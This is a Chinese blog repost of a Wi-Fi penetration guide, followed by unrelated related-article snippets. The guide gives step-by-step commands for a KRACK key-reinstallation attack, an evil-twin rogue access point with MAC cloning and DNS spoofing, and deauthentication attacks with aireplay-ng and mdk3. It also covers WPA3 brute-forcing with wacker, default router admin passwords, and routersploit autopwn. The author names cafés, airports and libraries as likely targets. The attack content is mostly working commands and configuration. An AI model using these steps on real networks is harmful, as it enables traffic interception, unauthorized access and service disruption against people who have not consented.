无线渗透|Wi-Fi渗透思路

news2024/11/18 18:31:53

对于WPA2 WPA3的一些渗透思路

0x00 进行渗透时需知晓的基础知识

1.WPA2:是WPA的升级版,是针对保护无线网络安全而设计的无线网络保护系统,引入了PSK(预共享密钥模式)秘钥,加强了WPA的不足之处,但是因为使用了PSK,所以只要攻击者知晓目标的PSK秘钥,就能十分轻易加入无线网络。

2.WPA3:是近几年新出现的无线网络安全保护系统,在WPA2的基础上实现了针对字典法暴力密码破解的难度,如果失败次数过多,AP将直接锁定攻击行为,以及取代了PSK使用对等实体验证(SAE)。

3.AP:特指无线网络接入点,就是路由器等设备的广泛称呼。

PS.实现无线网络攻击一般都需要两张或更多网卡,有时候也需要一些社工手段!购买无线网卡强烈建议购买支持802.11ac协议的网卡!!!

0x01 WPA2渗透思路

如果实在嫌跑密码的进度过慢或者没有好的字典,可以试一试wpa2的秘钥重装攻击(KRACK)
PS.本文所用的方法绝大部分没有使用大佬提供的POC,旨为了能够完全细化并理解KRACK攻击的步骤

0x02 秘钥重装攻击复现步骤:

秘钥重装攻击(KRACK):
此攻击针对WPA2协议中创建一个Nonce(一种共享密钥)的四次握手。

0x03 KRACK的原理:

WPA2的标准预期有偶尔发生的Wi-Fi断开连接,并允许使用同样的值重连第三次握手,以做到快速重连和连续性。因为标准不要求在此种重连时使用不同密钥,所以可能出现重放攻击。
攻击者还可以反复重发另一设备的第三次握手来重复操纵或重置WPA2的加密密钥。每次重置都会使用相同的值来加密数据,因此可以看到和匹配有相同数据的块,识别出被加密密钥链的数据块。随着反复的重置暴露越来越多的密钥链,最终整个密钥链将被获知,攻击者将可读取目标在此连接上的所有流量。
WPA2通常用于移动设备至固定接入点或家庭路由器的连接,尽管某些流量本身可能被SSL/TLS等协议加密,但风险仍十分严重。(资料来自百度百科)

1.启动网卡的混杂模式

sudo airmong-ng start <device1>

图片


2.对目标AP进行信息收集
先用

sudo airodump-ng <device1>

3.找到目标AP的BSSID

图片


这是我家中的2.4g无线网络,第一个使用桥接模式桥接了CMCC,因为两个路由器都已经安装了最新的固件把秘钥重装漏洞修复了,所以该次实验不会对我的路由器与设备造成损伤或是成功渗透,但是针对现实中像是咖啡店、机场、图书馆类的场景,路由器的固件很有可能并没有升级到最新版本,所以该攻击可能依然有效

4.锁定目标BSSID后,使用

sudo airodump-ng <device1> --bssid=<target bssid>

5.嗅探该AP中的所有成员

图片


如果没有成员的话可以插拔一下网卡(我才不会因为在复现过程中没看到网卡关闭等了十几分钟这件事说出来)

6.克隆Wi-Fi钓鱼热点
需要伪造一个同名,同mac地址的钓鱼热点
更改网卡mac地址步骤:

sudo ifconfig device2 down
sudo macchaner device2 -m <newmac> //注意,请将这里的newmac更改为目标AP点的mac地址
sudo ifconfig device2 up

伪造热点:

sudo airmong start wlan2 //开启网卡的监听模式
sudo airbase-ng -e <target SSID> -c <channel> <device2> //讲trget SSID更改为目标SSID,并且channel更改成不同的信道
sudo ifconfig at0 up //启动虚拟网关
sudo vi /etc/network/interfaces
------------------------------
//配置虚拟网卡地址参数
auto at0
iface at0 inet static
address 192.168.199.1 //这里最好与目标ap点的管理页面一样
netmask 255.255.255.0
------------------------------
sudo service networking restart //重启网卡服务
ifconfig at0查看at0网卡,如果没有ip地址或者不存在,重试以上步骤,注意!必须先使用airbase-ng创建AP点,at0网卡才会被可用!

配置DHCP:

sudo vi /etc/dhcp/dhcpd.conf
设置子网 掩码 分配地址范围等
在里面添加:
subnet 192.168.199.0 netmask 255.255.255.0{
range 192.168.199.100 192.168.199.150;
option routers 192.168.199.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 192.168.178.99; //注意这里的doamin地址需要自己更换
}

图片

 
进入下一配置文件,将at0指定为dhcp请求网卡
sudo vi /etc/default/isc-dhcp-server
将其中的INTERFACESv4=""更改为INTERFACESv4="at0"

图片


sudo service isc-dhcp-server restart //重启dhcp服务

配置dnsmasq

sudo vi /etc/dnsmasq.conf
添加以下内容:
resolv-file=/etc/resolv.conf //设置resolv目录
strict-order
listen-address=192.168.199.113 //这个ip是本机ip,如果只想本地访问可以填写127.0.0.1

address=/baidu.com/192.168.178.99 //注意,这一步很重要,需要在这里设置泛解析
address=/111.com/220.181.38.148

server=8.8.8.8
//设置谷歌dns为首选dns
server=114.114.114.114

sudo vi /etc/resolv.conf
添加nameserver为本机ip地址

图片


重启dnsmasq服务

sudo service dnsmasq restart

设置iptables进行流量转发:

//使用iptables编写规则:
iptables -t nat -A POSTROUTING -s 192.168.199.0/24 -j SNAT --to 192.168.178.99

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
//对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
//转发能上网的无线网卡流量
iptables -A FORWARD -p tcp --syn -s 192.168.199.0/24 -j TCPMSS --set-mss 1356
iptables-save //保存

克隆Wi-Fi后成功获取到成员进入网络提示信息
 

图片


7.但是我们也不能白等新的冤大头连上我们的热点,所以我们可以对目标AP的成员使用断网攻击使其强制掉线重连
aireplay-ng攻击:

//先对目标AP进行锁定监听并保存抓到的握手包
sudo airodump-ng <device1> --bssid=<target bssid> --channel=<channel> -w <文件保存路径>
//然后打开一个新的命令窗口进行攻击
sudo aireplay-ng -0 0 -a <target AP BSSID> -c <target member MAC> <device1>

mdk3/mdk4攻击:

vi blacklist //创建一个黑名单文件,并且把目标的BSSID填进去
sudo mdk3 <device> d -s 1000 -b blacklist.txt -c <target channel> //执行攻击
//mdk4同理,只需要把mdk3换成mdk4

稍等一会后,所有目标均已离线,2.4gAP网络用户断网连接后一般来说都可以直接获取到握手包。
8.获取四次握手的数据包
当左上角出现:
 

图片


就说明我们拿到了握手包
接着打开wireshak,将上一步的01号数据包到wireshark打开搜索字符串Message
需要找到
 

图片


然后右键选择标记分组
 

图片


之后选择左上角"文件"->导出特定分组->选择仅选中分组
 

图片


保存第三条握手包
9.实行攻击
(因为我这硬件条件实在不允许,就说一下实行攻击 的具体步骤,并且贴出大佬的POC吧)
(1)使用scapy伪造含有CSA(信道切换公告)信标的beacon管理帧,使成员强制连接到钓鱼热点
CSA信息元素:
 

图片


(2)向成员设备发送3号握手包多次,并允许1、2号握手包通过,阻断4号握手包使其强制安装秘钥

在此演示使用scapy发送三号握手包
sudo scapy //打开scapy
 

图片


在wireshark中我们可以看到Message 3 of 4被成功重传
 

图片

图片

攻击完成,攻击者打开wireshark监听,可以发现成员在目标AP内浏览的所有TCP明文

秘钥归0POC项目链接:

https://github.com/vanhoefm/krackattacks-poc-zerokey
KRACK攻击POC实例脚本地址:

https://github.com/vanhoefm/krackattacks-scripts

WPA3攻击思路

因为Dragonblood漏洞组并没有公布相关的攻击方式与POC,所以这一节我们来了解一下我在github上找的一个WPA3在线字典攻击工具----wacker
在使用工具前,我们需要先编译作者自改的wpa_supplicant
首先下载工具


git clone https://github.com/blunderbuss-wctf/wacker.git
cd wacker

图片


apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
cd wpa_supplicant-2.8/wpa_supplicant/
cp defconfig_brute_force .config
make -j4
ls -al wpa_supplicant
//执行玩上述步骤以构建wpa_supplicant后,我们就可以正常使用工具了

split.sh是用来为多个网卡进行分配破解工作而进行生成单次列表
使用:sudo ./split.sh <份数> <单词列表>
 

图片


wacker.py是程序本体
使用方法与选项:

 

--wordlist <wordlist> 指定使用的字典
--interface <interface> 指定使用的设备
--bssid <BSSID> 指定目标的BSSID
--ssid <SSID> WPA3的ssid
--freq <freq> AP的频率
--start <START_WORD> 从单词列表中的指定字符开始
--debug 输出debug信息
--wpa2 使用WPA2模式

图片


使用例:

图片

社会工程学/密码泄露手段

俗话说得好,当你不知道的时候建议直接去问,这也同样适用直接询问Wi-Fi密码
还有一种手段那就是直接使用Wi-Fi万能钥匙等这种密码泄漏工具,使用手机自带的生成Wi-Fi二维码功能,再配合扫码就能直接得到密码。

路由器后台渗透思路

在进入无线局域网后,我们可以对无线路由器的后台进行渗透,渗透后台的方法包括但不限于:漏洞、跑包、弱密码,后台密码很大概率会与Wi-Fi密码相同
这里贴出一些常用路由器的默认后台账号密码:

TP_LINK家用路由器:admin-admin
TP_LINK企业级路由器:admin-admin123456或admin-123456admin
Tenda路由器:admin-admin
360路由器:admin-admin
华为路由器:admin-admin
Netcore路由器:guest-guest
小米:没密码
FAST路由器:admin-admin
D-Link路由器:admin-admin
PHICOMM路由器:admin-admin

 

漏洞渗透思路:
谈到对路由器的漏洞攻击手段,不得不提到大名鼎鼎的routersploit
routersploit项目地址:

https://github.com/threat9/routersploit.git
routersploit的安装(kali下):

git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt

routersploit的使用:

sudo ./rsf.py //开启routersplot
use scanners/autopwn //执行自动扫描模块
show option //查看设置

图片

set target <路由器后台地址>
run //启动扫描

图片


耐心等待扫描结束,如果该漏洞对路由器有效的话,会直接列出来,如果可能对该路由器有用会列出可能有效的漏洞
 

图片


当routersploit无法胜任时,还有一个汇总各大路由器漏洞的网站:http://routerpwn.com/

图片

来源:https://forum.butian.net/share/1819

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

免费领取安全学习资料包!(私聊进群一起学习,共同进步)

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1150293.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

day45

今日内容 标签的分类 1.单标签 imr br hr <img /> 2.双标签 a h p div <a> </a> 3.按照标签属性分类 &#xff08;1&#xff09;块儿标签 &#xff08;自己独占一行&#xff09; h1-h6 p div &#xff08;2&#xff09;行内(内联)标签 &a…

探求flutter全栈开发

显示一种网络图片 import package:flutter/material.dart; main(){runApp(MaterialApp(theme: ThemeData.dark(),home:Home(),));}class Home extends StatelessWidget{overrideWidget build(BuildContext context) {// TODO: implement buildreturn Scaffold(appBar:AppBar(t…

H5随机短视频滑动版带打赏源码V1.3

全新H5滑动屏幕观看&#xff0c;可封装APP软件或嵌入式观看&#xff0c;网站引流必备源码&#xff01; 数据来源抖音和快手官方短视频链接&#xff0c;无任何违规内容&#xff01; 可自行添加广告等等&#xff01; 手机端完美支持滑动屏幕观看&#xff08;向上或向右&#x…

隔离模块CC10-2405SF-E,嵌入式(MCU) STM32F207IGT7、SPC5742PK1AMLQ9R规格参数

一、CC10-2405SF-E 1.3至10W DC-DC转换器 CC系列DC-DC转换器具有高密度&#xff0c;输出电压为3.3V、5V、12V和15VDC&#xff0c;额定输出功率为3W至30W。CC模块采用通孔或SMT封装&#xff0c;带或不带屏蔽金属外壳。这些器件适用于-40C至85C的扩展温度范围应用&#xff0c;具…

一文浅析Instagram网红经济为什么远远超出其他社媒平台

根据数据显示&#xff0c;网红营销市场规模在短短五年时间内从2016年的17亿美元增长至2022年的164亿美元&#xff0c;累计增速超过了712%。未来&#xff0c;有专家预计该市场预计将进一步增长&#xff0c;将在2023年突破210亿美元。这种惊人的增长趋势源于社交媒体的快速发展以…

Django实战项目-学习任务系统-定时任务管理

接着上期代码框架&#xff0c;开发第4个功能&#xff0c;定时任务管理&#xff0c;再增加一个学习定时任务表&#xff0c;主要用来设置周期重复性的学习任务&#xff0c;定时周期&#xff0c;定时时间&#xff0c;任务标题和内容&#xff0c;预计完成天数&#xff0c;奖励积分和…

PythonWEB

文章目录 前端简介1. 什么是网页2. 网页的组成3. 网页的优势4. 前端三剑客5. 编写步骤6. HTTP协议 HTML51. HTML介绍2. 元素3. 使用4. 基本结构解析5. 常用标签文本标签容器标签列表标签表格标签表单标签 对于文件数据的提交需要满足以下两个条件&#xff1a;6. 标签分类 前端简…

基于SpringBoot的体育馆管理系统

目录 前言 一、技术栈 二、系统功能介绍 管理员功能介绍 商品列表 场地信息管理 场地类型管理 三、核心代码 1、登录模块 2、文件上传模块 3、代码封装 前言 现代经济快节奏发展以及不断完善升级的信息化技术&#xff0c;让传统数据信息的管理升级为软件存储&#xff…

精益制造的工具与方法有什么区别?ECRS工时分析软件的功能和价值

精益制造是一套价值创造系统&#xff0c;它强调在生产过程中减少浪费、提高效率和质量&#xff0c;从而实现持续改进和优化。在精益制造的理念下&#xff0c;企业需要运用一系列的工具和方法来提升生产管理水平。这些工具和方法不仅包括传统的精益工具&#xff0c;如5S、持续改…

Java自学者怎么写简历?

Java自学者怎么写简历&#xff1f; 首先&#xff0c;有技术实力的人绝对不会问这个问题。虽然你是自学的&#xff0c;但是一定要有项目&#xff01;没有项目都是空谈。最近很多小伙伴找我&#xff0c;说想要一些Java资料&#xff0c;然后我根据自己从业十年经验&#xff0c;熬夜…

使用 Sealos 一键部署 Kubernetes 集群

Sealos 是一款以 Kubernetes 为内核的云操作系统发行版&#xff0c;使用户能够像使用个人电脑一样简单地使用云。 与此同时&#xff0c;Sealos 还提供一套强大的工具&#xff0c;可以便利地管理整个 Kubernetes 集群的生命周期。 Sealos 不仅可以一键安装一个单节点的 Kubern…

设计模式(21)中介者模式

一、介绍&#xff1a; 1、定义&#xff1a;中介者模式&#xff08;Mediator Pattern&#xff09;是一种行为型设计模式&#xff0c;它通过引入一个中介者对象来降低多个对象之间的耦合度。在中介者模式中&#xff0c;各个对象之间不直接进行通信&#xff0c;而是通过中介者对象…

Nginx 实战指南:暴露出请求的真实 IP

&#x1f52d; 嗨&#xff0c;您好 &#x1f44b; 我是 vnjohn&#xff0c;在互联网企业担任 Java 开发&#xff0c;CSDN 优质创作者 &#x1f4d6; 推荐专栏&#xff1a;Spring、MySQL、Nacos、Java&#xff0c;后续其他专栏会持续优化更新迭代 &#x1f332;文章所在专栏&…

跑腿小程序开发解析:技术架构、接口设计和前沿趋势

随着生活节奏的加快和个人需求的增加&#xff0c;跑腿小程序成为了人们生活中不可或缺的一部分。从技术角度来看&#xff0c;一个高效、安全、以及用户友好的跑腿小程序是由多个关键要素构成的&#xff0c;包括技术架构、接口设计和前沿趋势。 技术架构 1. 前端技术选型 选择…

Windows Server 2016磁盘管理使用指南:看完即会!

如何打开Windows Server 2016磁盘管理器&#xff1f; 磁盘管理首先在Windows XP中引入&#xff0c;是一个Windows内置实用程序&#xff0c;可让你管理硬盘和关联的分区或卷。在Windows Server磁盘管理对硬盘进行分区非常方便。你可以通过以下方法之一访问它&#xff1a; 方…

数据库系统原理与实践 笔记 #6

文章目录 数据库系统原理与实践 笔记 #6数据库设计和E-R模型设计过程实体-联系模型实体集联系集联系集中实体的角色联系集的度属性复合属性 约束映射基数约束参与约束实体集的码联系集的码冗余属性 实体-联系图E-R图参与联系集中的实体集基数约束角色三元关系上的基数约束弱实体…

JMeter简单使用

JMeter是一个功能强大的开源性能测试工具&#xff0c;用于对各种应用程序、协议和服务器进行性能和负载测试。它被广泛用于测试Web应用程序的性能&#xff0c;并可以模拟多种负载条件和行为。 JMeter使用 添加线程组 设置线程组的配置 设置请求 配置请求 添加监听器 查看压…

Java微服务构建:打造健壮订单模型的完整指南

Java微服务构建一个健壮的订单模型(业务,规划&#xff0c;设计与实现) 在设计领域业务模型时&#xff0c;我们通常会追求理论完美&#xff0c;而忽略实践的脆弱性。尽管我们没有贬低领域建模的意图&#xff0c;但事实上&#xff0c;在电商技术发展多年之后&#xff0c;某些系统…

idea中启动多例项目配置

多实例启动 日常本地开发微服务项目时&#xff0c;博主想要验证一下网关的负载均衡以及感知服务上下线能力时&#xff0c;需要用到多实例启动。 那么什么是多实例启动嘞&#xff1f;简单说就是能在本地同时启动多个同一服务。打个比方项目中有一个 MobileApplication 服务&…

怎么压缩视频?试试这个方法

怎么压缩视频&#xff1f;我们都知道视频的内存比其他类型的文件都要大很多。那是因为视频的分辨率越高&#xff0c;所包含的像素点就越多&#xff0c;因此文件大小也就越大。而且一般来说&#xff0c;视频文件的时长都比较长&#xff0c;当视频的时间越长&#xff0c;那么视频…